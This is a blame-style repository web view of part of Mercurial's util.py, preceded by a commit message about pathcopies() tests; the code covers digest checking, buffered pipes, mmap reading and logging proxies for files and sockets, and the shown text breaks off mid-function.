##// END OF EJS Templates
tests: add tests of pathcopies()...
tests: add tests of pathcopies() I'm working on support for storing copy metadata in the changeset instead of in the filelog. When storing it in the changeset, it will obviously be efficient to get the copy metadata for all files in a single changeset, but it will be more expensive to get the copy metadata for all revisions of a single file. Some algorithms will then need to be optimized differently. The first method I'm going to rewrite is pathcopies(). This commit adds many tests for pathcopies(), so we can run the tests with both old and new versions of the code, as well as with metadata stored in filelog or in changeset (later). They use the debugpathcopies command I recently added (with no tests when it was added). They show a few bugs and a few cases of slightly weird behavior. I'll fix the bugs in the next few commits. Differential Revision: https://phab.mercurial-scm.org/D5986

File last commit:

r41429:b141b524 default
r41917:4ec0ce0f default
Show More
util.py
4021 lines | 125.4 KiB | text/x-python | PythonLexer
timeless@mozdev.org
spelling: specific
r17515 # util.py - Mercurial utility functions and platform specific implementations
Martin Geisler
put license and copyright info into comment blocks
r8226 #
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
Matt Mackall
Update license to GPLv2+
r10263 # GNU General Public License version 2 or any later version.
mpm@selenic.com
Update util.py docstrings, fix walk test
r1082
timeless@mozdev.org
spelling: specific
r17515 """Mercurial utility functions and platform specific implementations.
mpm@selenic.com
Update util.py docstrings, fix walk test
r1082
Martin Geisler
turn some comments back into module docstrings
r8227 This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
mpm@selenic.com
Update util.py docstrings, fix walk test
r1082 """
mpm@selenic.com
[PATCH] file seperator handling for the other 'OS'...
r419
Yuya Nishihara
doctest: use print_function and convert bytes to unicode where needed
r34139 from __future__ import absolute_import, print_function
Gregory Szorc
util: use absolute_import
r27358
Martin von Zweigbergk
util: add base class for transactional context managers...
r33790 import abc
Gregory Szorc
util: use absolute_import
r27358 import bz2
import collections
Martin von Zweigbergk
histedit: extract InterventionRequired transaction handling to utils...
r33446 import contextlib
Gregory Szorc
util: use absolute_import
r27358 import errno
import gc
import hashlib
Mark Thomas
util: add safename function for generating safe names to rename to...
r34555 import itertools
Mark Thomas
util: add an mmapread method...
r34296 import mmap
Gregory Szorc
util: use absolute_import
r27358 import os
Jun Wu
util: improve iterfile so it chooses code path wisely...
r30418 import platform as pyplatform
Siddharth Agarwal
util: rename 're' to 'remod'...
r21907 import re as remod
Gregory Szorc
util: use absolute_import
r27358 import shutil
import socket
Jun Wu
util: improve iterfile so it chooses code path wisely...
r30418 import stat
Gregory Szorc
util: use absolute_import
r27358 import sys
import time
import traceback
Pierre-Yves David
util: add a way to issue deprecation warning without a UI object...
r31950 import warnings
Pierre-Yves David
changegroup: move all compressions utilities in util...
r26266 import zlib
Matt Mackall
Add encoding detection
r3769
Martijn Pieters
util: create a context manager to handle timing...
r38833 from .thirdparty import (
attr,
)
Augie Fackler
util: make timedcm require the label (API)...
r39295 from hgdemandimport import tracing
Gregory Szorc
util: use absolute_import
r27358 from . import (
encoding,
error,
i18n,
Pulkit Goyal
py3: use node.hex(h.digest()) instead of h.hexdigest()...
r35600 node as nodemod,
Yuya Nishihara
osutil: switch to policy importer...
r32367 policy,
timeless
pycompat: add empty and queue to handle py3 divergence...
r28818 pycompat,
Augie Fackler
urllibcompat: move some adapters from pycompat to urllibcompat...
r34468 urllibcompat,
Gregory Szorc
util: use absolute_import
r27358 )
Yuya Nishihara
stringutil: move generic string helpers to new module...
r37101 from .utils import (
Yuya Nishihara
procutil: move process/executable management functions to new module...
r37136 procutil,
Yuya Nishihara
stringutil: move generic string helpers to new module...
r37101 stringutil,
)
Matt Mackall
Add encoding detection
r3769
Yuya Nishihara
base85: switch to policy importer
r32368 base85 = policy.importmod(r'base85')
Yuya Nishihara
osutil: switch to policy importer...
r32367 osutil = policy.importmod(r'osutil')
Yuya Nishihara
parsers: switch to policy importer...
r32372 parsers = policy.importmod(r'parsers')
Yuya Nishihara
osutil: switch to policy importer...
r32367
Yuya Nishihara
base85: proxy through util module...
r32200 b85decode = base85.b85decode
b85encode = base85.b85encode
Gregory Szorc
util: make cookielib module available...
r31934 cookielib = pycompat.cookielib
Yuya Nishihara
util: rewrite pycompat imports to make pyflakes always happy...
r30471 httplib = pycompat.httplib
pickle = pycompat.pickle
Yuya Nishihara
util: make safehasattr() a pycompat function...
r37117 safehasattr = pycompat.safehasattr
Yuya Nishihara
util: rewrite pycompat imports to make pyflakes always happy...
r30471 socketserver = pycompat.socketserver
Gregory Szorc
util: prefer "bytesio" to "stringio"...
r36976 bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
Yuya Nishihara
util: rewrite pycompat imports to make pyflakes always happy...
r30471 xmlrpclib = pycompat.xmlrpclib
timeless
pycompat: switch to util.urlreq/util.urlerr for py3 compat
r28883
Augie Fackler
urllibcompat: move some adapters from pycompat to urllibcompat...
r34468 httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq
FUJIWARA Katsunori
win32mbcs: avoid unintentional failure at colorization...
r32566 # workaround for win32mbcs
_filenamebytestr = pycompat.bytestr
Jun Wu
codemod: use pycompat.iswindows...
r34646 if pycompat.iswindows:
Gregory Szorc
util: use absolute_import
r27358 from . import windows as platform
Adrian Buehlmann
util: move windows and posix wildcard imports to begin of file
r14912 else:
Gregory Szorc
util: use absolute_import
r27358 from . import posix as platform
Adrian Buehlmann
util: eliminate wildcard imports
r14926
Gregory Szorc
util: use absolute_import
r27358 _ = i18n._
Adrian Buehlmann
util: eliminate wildcard imports
r14926
Yuya Nishihara
chgserver: extract utility to bind unix domain socket to long path...
r29530 bindunixsocket = platform.bindunixsocket
Idan Kamara
posix, windows: introduce cachestat...
r14927 cachestat = platform.cachestat
Adrian Buehlmann
util: eliminate wildcard imports
r14926 checkexec = platform.checkexec
checklink = platform.checklink
Adrian Buehlmann
util: move copymode into posix.py and windows.py...
r15011 copymode = platform.copymode
Adrian Buehlmann
util: eliminate wildcard imports
r14926 expandglobs = platform.expandglobs
Matt Harbison
util: add a function to show the mount point of the filesystem...
r35531 getfsmountpoint = platform.getfsmountpoint
Matt Harbison
util: move getfstype() to the platform modules...
r35527 getfstype = platform.getfstype
Adrian Buehlmann
util: eliminate wildcard imports
r14926 groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
Yuya Nishihara
osutil: proxy through util (and platform) modules (API)...
r32203 listdir = osutil.listdir
Adrian Buehlmann
util: eliminate wildcard imports
r14926 localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
Matt Mackall
dirstate: fix case-folding identity for traditional Unix...
r15488 normcase = platform.normcase
Siddharth Agarwal
util: add normcase spec and fallback...
r24605 normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
Adrian Buehlmann
util: eliminate wildcard imports
r14926 openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
Pierre-Yves David
util: add a simple poll utility...
r25420 poll = platform.poll
Adrian Buehlmann
util: eliminate wildcard imports
r14926 posixfile = platform.posixfile
Matt Harbison
py3: convert os.readlink() path to native strings on Windows...
r39940 readlink = platform.readlink
Adrian Buehlmann
util: eliminate wildcard imports
r14926 rename = platform.rename
FUJIWARA Katsunori
util: add removedirs as platform depending function...
r24692 removedirs = platform.removedirs
Adrian Buehlmann
util: eliminate wildcard imports
r14926 samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
Bryan O'Sullivan
util: implement a faster os.path.split for posix systems...
r17560 split = platform.split
Bryan O'Sullivan
osutil: write a C implementation of statfiles for unix...
r18026 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
Bryan O'Sullivan
util: add functions to check symlink/exec bits...
r18868 statisexec = platform.statisexec
statislink = platform.statislink
Adrian Buehlmann
util: eliminate wildcard imports
r14926 umask = platform.umask
unlink = platform.unlink
username = platform.username
Adrian Buehlmann
util: move windows and posix wildcard imports to begin of file
r14912
Yuya Nishihara
osutil: proxy through util (and platform) modules (API)...
r32203 try:
recvfds = osutil.recvfds
except AttributeError:
pass
Dirkjan Ochtman
python 2.6 compatibility: compatibility wrappers for hash functions
r6470 # Python compatibility
Matt Mackall
Add encoding detection
r3769
Matt Mackall
util: clean up function ordering
r15656 _notset = object()
Remi Chaintron
revlog: flag processor...
def bitsfrom(container):
    """Return the bitwise OR of every value yielded by ``container``.

    An empty container yields 0.
    """
    combined = 0
    for flag in container:
        combined |= flag
    return combined
Pierre-Yves David
util: add a way to issue deprecation warning without a UI object...
# Python 2.6 still has deprecation warnings enabled by default. We do not
# want to display anything to standard users, so detect whether we are
# running tests and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
    if pycompat.ispy3:
        # silence warning emitted by passing user string to re.sub()
        warnings.filterwarnings(
            r'ignore', r'bad escape', DeprecationWarning, r'mercurial')
        warnings.filterwarnings(
            r'ignore', r'invalid escape sequence', DeprecationWarning,
            r'mercurial')
        # TODO: reinvent imp.is_frozen()
        warnings.filterwarnings(
            r'ignore', r'the imp module is deprecated', DeprecationWarning,
            r'mercurial')
Pierre-Yves David
util: add a way to issue deprecation warning without a UI object...
r31950
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a native Python deprecation warning.

    Nothing happens unless the module-level ``_dowarn`` flag is set. Use
    'ui.deprecwarn' when possible.

    ``msg`` is the warning text, ``version`` is interpolated into the
    "compatibility will be dropped" suffix, and ``stacklevel`` is relative
    to the caller (one extra frame is added for this function).
    """
    if not _dowarn:
        return
    suffix = ("\n(compatibility will be dropped after Mercurial-%s,"
              " update your code.)") % version
    warnings.warn(pycompat.sysstr(msg + suffix), DeprecationWarning,
                  stacklevel + 1)
Pierre-Yves David
util: add a way to issue deprecation warning without a UI object...
r31950
Mike Hommey
util: add a helper class to compute digests...
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        """Create one hash object per name in ``digests``.

        Raises error.Abort if a name is not a key of DIGESTS. If ``s`` is
        non-empty it is fed to every hash immediately.
        """
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` to every tracked hash object."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest computed so far for digest type ``key``.

        Raises error.Abort if ``key`` is not a key of DIGESTS.
        """
        if key not in DIGESTS:
            # Report the key that was actually requested. The previous code
            # formatted ``k``, which is not a local here and resolved to the
            # leftover module-level loop variable.
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        """Iterate over the names of the tracked digest types."""
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""
        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
Mike Hommey
util: add a file handle wrapper class that does hash digest validation...
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        expected = dict(digests)
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = expected
        self._digester = digester(expected.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, hashing and counting the result."""
        chunk = self._fh.read(length)
        self._digester.update(chunk)
        self._got += len(chunk)
        return chunk

    def validate(self):
        """Abort if the byte count or any digest differs from expectations."""
        if self._got != self._size:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for name, wanted in self._digests.items():
            actual = self._digester[name]
            if wanted == actual:
                continue
            # i18n: first parameter is a digest name
            raise error.Abort(_('%s mismatch: expected %s, got %s') %
                              (name, wanted, actual))
Mike Hommey
util: add a file handle wrapper class that does hash digest validation...
r22963
Renato Cunha
util: improved the check for the existence of the 'buffer' builtin...
try:
    # Keep the builtin when the interpreter provides one.
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        """memoryview-based stand-in for the missing ``buffer`` builtin.

        Returns a view of ``sliceable`` starting at ``offset``; when
        ``length`` is given the view stops at ``offset + length``.
        """
        view = memoryview(sliceable)
        if length is None:
            return view[offset:]
        return view[offset:offset + length]
Ronny Pfannschmidt
util: fake the builtin buffer if it's missing (jython)
r10756
Pierre-Yves David
util: introduce a bufferedinputpipe utility...
_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        target = cls
        if isinstance(fh, fileobjectproxy):
            target = observedbufferedinputpipe
        return super(bufferedinputpipe, target).__new__(target)

    def __init__(self, input):
        self._input = input
        # list of pending chunks; _lenbuf caches their combined length
        self._buffer = []
        self._lenbuf = 0
        self._eof = False

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there
        is already data then no polling should be set in place."""
        return len(self._buffer) > 0

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """Return up to ``size`` data, filling the buffer until EOF if needed."""
        while not (self._eof or self._lenbuf >= size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        """Return at most ``size`` data, doing at most one underlying read.

        The underlying read only happens when nothing is buffered yet.
        """
        if self._lenbuf == 0 and not self._eof:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        """Return buffered data up to and including the next newline.

        At EOF without a newline, everything that is buffered is returned.
        """
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        newlineat = -1
        if self._buffer:
            newlineat = self._buffer[-1].find('\n')
        while newlineat < 0 and not self._eof:
            self._fillbuffer()
            if self._buffer:
                newlineat = self._buffer[-1].find('\n')
        if newlineat < 0:
            # end of file
            size = self._lenbuf
        else:
            size = newlineat + 1
            if len(self._buffer) > 1:
                # we need to take previous chunks into account
                size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        if len(self._buffer) > 1:
            pending = ''.join(self._buffer)
        else:
            pending = self._buffer[0]
        data = pending[:size]
        remainder = pending[len(data):]
        # collapse whatever is left into at most one chunk
        self._buffer = [remainder] if remainder else []
        self._lenbuf = len(remainder)
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if data:
            self._lenbuf += len(data)
            self._buffer.append(data)
        else:
            # an empty read marks end of file
            self._eof = True
        return data
Mark Thomas
util: add an mmapread method...
def mmapread(fp):
    """Return a read-only memory map of ``fp``.

    ``fp`` may be an object with a ``fileno()`` method or a raw file
    descriptor. Empty files cannot be mmapped; an empty string is returned
    for them instead. Any other ``ValueError`` is propagated.
    """
    # Resolve the descriptor before the try block: if fileno() itself raised
    # ValueError (e.g. closed file), the handler below would otherwise touch
    # an unbound ``fd`` and mask the real error.
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
Gregory Szorc
util: add a file object proxy that can notify observers...
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        # Go through object.__setattr__ because our own __setattr__ forwards
        # every assignment to the wrapped object.
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        observed = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods; everything else is answered by the
        # wrapped object directly.
        if name not in observed:
            return getattr(object.__getattribute__(self, r'_orig'), name)
        return object.__getattribute__(self, name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        """Invoke ``name`` on the wrapped object, then notify the observer."""
        # Call the original object.
        target = object.__getattribute__(self, r'_orig')
        result = getattr(target, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        watcher = object.__getattribute__(self, r'_observer')
        callback = getattr(watcher, name, None)
        if callback:
            callback(result, *args, **kwargs)

        return result

    # Each method below fetches _observedcall through
    # object.__getattribute__ because our own __getattribute__ would forward
    # the lookup to the wrapped object.

    def close(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        observed = object.__getattribute__(self, r'_observedcall')
        return observed(r'read1', *args, **kwargs)
Gregory Szorc
util: enable observing of util.bufferedinputpipe...
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """

    def _fillbuffer(self, size=_chunksize):
        """Fill the buffer, then report the read to the observer's ``osread``.

        The signature mirrors ``bufferedinputpipe._fillbuffer`` so that
        callers passing an explicit size (``unbufferedread``) keep working,
        and the observer is told the size that was actually requested.
        """
        res = super(observedbufferedinputpipe, self)._fillbuffer(size=size)

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, size)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        """Buffered read that also notifies the observer's ``bufferedread``."""
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        """Buffered readline that notifies ``bufferedreadline`` on the observer."""
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res
Gregory Szorc
util: observable proxy objects for sockets...
# Names that socketproxy resolves on itself (and therefore observes); every
# other attribute is looked up on the wrapped socket.
PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        # Go through object.__setattr__ because our own __setattr__ forwards
        # every assignment to the wrapped socket.
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        """Invoke ``name`` on the wrapped socket, then notify the observer."""
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        # The dispatched name must be the real socket method; the previous
        # spelling (``recv_info``) raised AttributeError on every call.
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)
class baseproxyobserver(object):
    """Shared helper for observers that log data to ``self.fh``.

    Reads the ``fh``, ``name``, ``logdata`` and ``logdataapis``
    attributes, which this class does not set itself.
    """

    def _writedata(self, data):
        """Write the data portion of a log entry and flush the log.

        With ``logdata`` disabled, only the newline terminating an API
        line is written (and only if ``logdataapis`` is set). Otherwise
        the escaped payload is written: on the API line itself when it
        contains no newline, or one ``name>`` line per payload line.
        """
        out = self.fh

        if not self.logdata:
            if self.logdataapis:
                out.write('\n')
                out.flush()
            return

        if b'\n' in data:
            # Data with newlines is written to multiple lines.
            if self.logdataapis:
                out.write(':\n')
            for piece in data.splitlines(True):
                out.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(piece)))
        elif self.logdataapis:
            # Simple case writes all data on a single line.
            out.write(': %s\n' % stringutil.escapestr(data))
        else:
            out.write('%s> %s\n'
                      % (self.name, stringutil.escapestr(data)))

        out.flush()
Gregory Szorc
util: add a file object proxy that can notify observers...
r36541
Gregory Szorc
util: observable proxy objects for sockets...
class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""

    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        """Remember the log handle ``fh``, the ``name`` prefix and flags.

        ``reads`` / ``writes`` select which kinds of calls are logged,
        ``logdataapis`` controls the per-call API line and ``logdata``
        controls whether the payload is logged.
        """
        self.fh, self.name = fh, name
        self.logdata, self.logdataapis = logdata, logdataapis
        self.reads, self.writes = reads, writes

    def read(self, res, size=-1):
        """Log a ``read()`` call that returned ``res``."""
        if not self.reads:
            return

        # Python 3 can return None from reads at EOF instead of empty
        # strings.
        data = '' if res is None else res

        if data == '' and size == -1:
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(data)))

        self._writedata(data)

    def readline(self, res, limit=-1):
        """Log a ``readline()`` call that returned ``res``."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        """Log a ``readinto()`` call that stored ``res`` bytes in ``dest``."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        if res is None:
            payload = b''
        else:
            payload = dest[0:res]
            # _writedata() uses "in" operator and is confused by
            # memoryview because characters are ints on Python 3.
            if isinstance(payload, memoryview):
                payload = payload.tobytes()

        self._writedata(payload)

    def write(self, res, data):
        """Log a ``write()`` call of ``data`` that returned ``res``."""
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3
        # (reasonably) returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        """Log a ``flush()`` call that returned ``res``."""
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        """Log a ``bufferedread()`` call that returned ``res``."""
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        """Log a ``bufferedreadline()`` call that returned ``res``."""
